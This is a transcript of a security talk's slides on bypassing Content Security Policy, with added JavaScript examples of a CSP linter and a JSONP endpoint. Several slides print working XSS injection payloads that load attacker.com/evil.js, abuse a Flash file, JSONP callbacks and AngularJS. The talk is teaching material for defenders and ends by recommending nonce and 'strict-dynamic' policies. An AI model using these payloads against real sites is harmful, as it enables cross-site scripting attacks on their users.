
Content Security Policy bypass techniques

Artur Hil
September 25, 2019


Transcript

  1. What the hell is this?

     Content Security Policy (CSP) is a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks that result from executing malicious content in the context of a trusted web page.
  2. Yay! We don't need any input validation now!

     After all, CSP is meant to prevent XSS, clickjacking and code injection attacks.
  3. Actually, NO

     CSP provides a standard method for website owners to declare the approved origins of content that browsers should be allowed to load on that website. It is a mitigation layer on top of input validation and output encoding, not a replacement for them.
  4. Ambitious goals of CSP

     • Mitigate risk
     • Control over resources
     • Control over execution
     • Reduce the privilege of the application
     • Content is forced into a unique origin
     • Detect exploitation by monitoring violations
     • Collect violation reports
  5. CSP directives… Many, for many different problems

     media-src, base-uri, font-src, plugin-types, connect-src, style-src, script-src, child-src, report-to, navigate-to, form-action, sandbox, script-src-elem, prefetch-src, worker-src
  6. How does it work?

     Page on example.com:
       <img src="cat.jpg">
       <script src="//good.com/dog.js">

     CSP: default-src 'self'; script-src 'self' good.com; report-uri /csp_alert_logger;

     Both resources load: example.com is 'self' and good.com is whitelisted for scripts.
  7. How does it work?

     Same page and policy as before. An attacker injects:
       "><script src="//attacker.com/evil.js">
       "><script>alert(balalaya)</script>

     Both are blocked and reported to example.com/csp_alert_logger: the first because attacker.com is not a whitelisted source, the second because inline scripts are not allowed.
  8. I deployed CSP! Now I'm safe! Not exactly: trivial mistake #1

     script-src 'self' 'unsafe-inline'; object-src 'none';

     'unsafe-inline' in script-src instead of a 'nonce-...'. The same applies to default-src when no script-src directive is set.

     Bypass: "><script>alert(12345)</script>
  9. I deployed CSP! Now I'm safe! Not exactly: trivial mistake #2

     script-src 'self' https: data: *; object-src 'none';

     URL schemes or a wildcard in script-src instead of 'strict-dynamic'. The same applies to URL schemes and wildcards in object-src.

     Bypass: "><script src=https://attacker.com/evil.js></script>
             "><script src=data:text/javascript,alert(12345)></script>
  10. I deployed CSP! Now I'm safe! Not exactly: trivial mistake #3

     script-src 'self';

     Looks secure, but the object-src (or default-src) directive is missing, so plugin content such as Flash is unrestricted and can execute script.

     Bypass: "><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(12345)}//'><param name="AllowScriptAccess" value="always"></object>
  11. I deployed CSP! Now I'm safe! Not exactly: trivial mistake #4

     script-src 'self'; object-src 'none';

     Allowing 'self' while hosting user-provided content on the same origin: an uploaded file becomes a whitelisted script source. The same applies to object-src and default-src.

     Bypass: "><script src="/user_upload/evil_cat.jpg.js"></script>
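Added example, not from the deck: a small JavaScript linter that flags the four trivial mistakes from slides 8 to 11 in a Content-Security-Policy header string. The function names (parseCsp, lintCsp), the finding format and the sample policies are assumptions; the policies are the ones shown on the slides, and 'strict-dynamic' is the CSP 3 keyword that makes browsers ignore host whitelists. The linter only sees the header text, so host entries such as 'self' or good.com are reported for review rather than as definite bypasses: whether they are exploitable depends on what those hosts serve (user uploads, JSONP, AngularJS).

```javascript
// Added example, not from the deck: a minimal CSP linter for the "trivial mistakes".
'use strict';

// "script-src 'self' good.com; object-src 'none'" -> Map { 'script-src' => ["'self'", 'good.com'], ... }
function parseCsp(header) {
  const policy = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy.set(name.toLowerCase(), values);
  }
  return policy;
}

// The directive that governs a fetch type: the specific one, else default-src, else nothing.
function governing(policy, directive) {
  for (const name of [directive, 'default-src']) {
    if (policy.has(name)) return { name, values: policy.get(name) };
  }
  return null;
}

const QUOTED_KEYWORD = /^'.*'$/;             // 'self', 'none', 'nonce-...', 'unsafe-inline', ...
const BARE_SCHEME = /^[a-z][a-z0-9+.-]*:$/i; // https:, data:, blob:, ...

function lintCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  const add = (level, msg) => findings.push({ level, msg });

  // Schemes and wildcards are exploitable outright; hosts depend on what they serve.
  const checkSources = (name, values, ignoreHosts) => {
    for (const v of values) {
      if (v === '*' || BARE_SCHEME.test(v)) {
        add('high', `${name}: "${v}" whitelists every source matching it (mistake #2)`);
      } else if ((v === "'self'" || !QUOTED_KEYWORD.test(v)) && !ignoreHosts) {
        add('review', `${name}: host entry ${v}; check it serves no user uploads, JSONP or AngularJS (mistake #4)`);
      }
    }
  };

  const script = governing(policy, 'script-src');
  if (!script) {
    add('high', 'no script-src or default-src: injected scripts are not restricted at all');
  } else {
    const vals = script.values;
    const nonceOrHash = vals.some((v) => /^'(nonce-|sha(256|384|512)-)/.test(v));
    const strictDynamic = vals.includes("'strict-dynamic'");
    // Mistake #1: 'unsafe-inline' with no nonce/hash means "><script>alert(1)</script> runs.
    // (Browsers ignore 'unsafe-inline' once a nonce or hash is present.)
    if (vals.includes("'unsafe-inline'") && !nonceOrHash) {
      add('high', `${script.name}: 'unsafe-inline' without a nonce or hash lets injected inline scripts run (mistake #1)`);
    }
    // With 'strict-dynamic' the browser ignores host and 'self' entries, so they need no review.
    checkSources(script.name, vals, strictDynamic);
  }

  // Mistake #3: nothing governs <object>/<embed>, so plugin content can execute script.
  const object = governing(policy, 'object-src');
  if (!object) {
    add('high', 'no object-src or default-src: <object>/<embed> plugin content can execute script (mistake #3)');
  } else if (!script || object.name !== script.name) {
    checkSources(object.name, object.values, false);
  }
  return findings;
}

// Constructed inputs: the policies from the slides plus the nonce + 'strict-dynamic' policy.
const SLIDE_POLICIES = {
  mistake1: "script-src 'self' 'unsafe-inline'; object-src 'none';",
  mistake2: "script-src 'self' https: data: *; object-src 'none';",
  mistake3: "script-src 'self';",
  mistake4: "script-src 'self'; object-src 'none';",
  strict:   "script-src 'nonce-r4nd0m123' 'strict-dynamic'; object-src 'none';",
};
for (const [label, policy] of Object.entries(SLIDE_POLICIES)) {
  console.log(label, lintCsp(policy));
}
```

Only the strict policy comes back with no findings; mistake #4 produces a review item rather than a high one because the header alone cannot tell whether 'self' hosts anything an attacker controls.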
  12. Whitelisting JSONP is a problem

     script-src 'self' https://whitelisted.com; object-src 'none';

     A JSONP-like endpoint on a whitelisted host reflects the callback parameter as code.

     Bypass: "><script src="https://whitelisted.com/jsonp?callback=alert">
  13. Whitelisting JSONP is a problem

     CSP: script-src 'self' https://whitelisted.com; object-src 'none';

     The endpoint answers with the callback wrapped around the data, e.g. alert(12345);u({...}) or x.click({...}).

     Bypass: "><script src="https://whitelisted.com/jsonp?callback=alert(12345);u">
             "><script src="https://whitelisted.com/jsonp?callback=x.click">

     Don't whitelist JSONP endpoints!
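Added example, not from the deck: what the JSONP endpoint on slides 12 and 13 hands an attacker. jsonpResponse() mimics the usual implementation, which echoes the ?callback= value in front of the JSON; jsonpResponseStrict() is the common "fix" of accepting only a dotted identifier. The function names and the DATA payload are constructed; the callback values are the ones from the slides.

```javascript
// Added example, not from the deck: a JSONP endpoint, naive and "hardened".
'use strict';

const DATA = { user: 'alice', id: 42 }; // constructed: what the endpoint normally returns

// Typical JSONP endpoint: the callback name is reflected verbatim in front of the JSON.
function jsonpResponse(callback) {
  return `${callback}(${JSON.stringify(DATA)})`;
}

// Hardened variant: the callback must be a (dotted) JavaScript identifier, else reject.
const IDENTIFIER = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function jsonpResponseStrict(callback) {
  return IDENTIFIER.test(callback) ? jsonpResponse(callback) : null; // null stands for HTTP 400
}

// The payloads from slides 12 and 13. The browser requests them via
// <script src="https://whitelisted.com/jsonp?callback=..."> and executes the
// response body as a script from an allowed source, so the CSP does not object.
const SLIDE_CALLBACKS = ['alert', 'alert(12345);u', 'x.click'];
for (const cb of SLIDE_CALLBACKS) {
  console.log(JSON.stringify(cb), '->', jsonpResponse(cb), '| strict:', jsonpResponseStrict(cb));
}
```

The identifier check stops the alert(12345);u trick, but callback=alert and callback=x.click still pass and still run attacker-chosen code with the data object as argument; the endpoint stays usable as a script source, which is why the advice is not to whitelist the host at all rather than to validate the callback.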
  14. AngularJS library in the whitelist

     script-src 'self' https://whitelisted.com; object-src 'none';

     Bypass: "><script src="https://whitelisted.com/angular.min.js"></script><div ng-app ng-csp>{{2+2}}</div>
             "><script src="https://whitelisted.com/angularjs/1.1.3/angular.min.js"></script><div ng-app ng-csp id=p ng-click=$event.view.alert(4)>

     The second payload needs a click; it also works without user interaction when combined with JSONP endpoints or other JS libraries on the whitelisted host.
  15. Best way to make CSP safe

     script-src 'nonce-r4nd0m123'; object-src 'none';

     Benefits:
     • All <script> tags with the correct nonce attribute are executed
     • <script> tags injected via XSS are blocked because the nonce is missing
     • No host/path whitelists: none of the whitelist bypasses above apply

     The nonce must be unpredictable and freshly generated for every response; a static or guessable nonce is equivalent to 'unsafe-inline'.
  16. How does a nonce work?

     Page on example.com:
       <img src="cat.jpg">
       <script nonce="r4nd0m123" src="//some.site/dog.js">

     CSP: default-src 'self'; script-src 'self' 'nonce-r4nd0m123'; report-uri /csp_alert_logger;

     dog.js loads because its tag carries the nonce. An attacker injects:
       "><script src="//attacker.com/evil.js">
       "><script>alert(balalaya)</script>

     Both are blocked and reported to example.com/csp_alert_logger: script without correct nonce.
  17. A new way to make CSP (CSP level 3)

     script-src 'nonce-r4nd0m123' 'strict-dynamic'; object-src 'none';

     • 'nonce-r4nd0m123': allows all scripts to execute if the correct nonce is set.
     • 'strict-dynamic': propagates trust from nonced scripts to the scripts they load and makes the browser discard host whitelists (an early CSP 3 draft called this keyword 'unsafe-dynamic').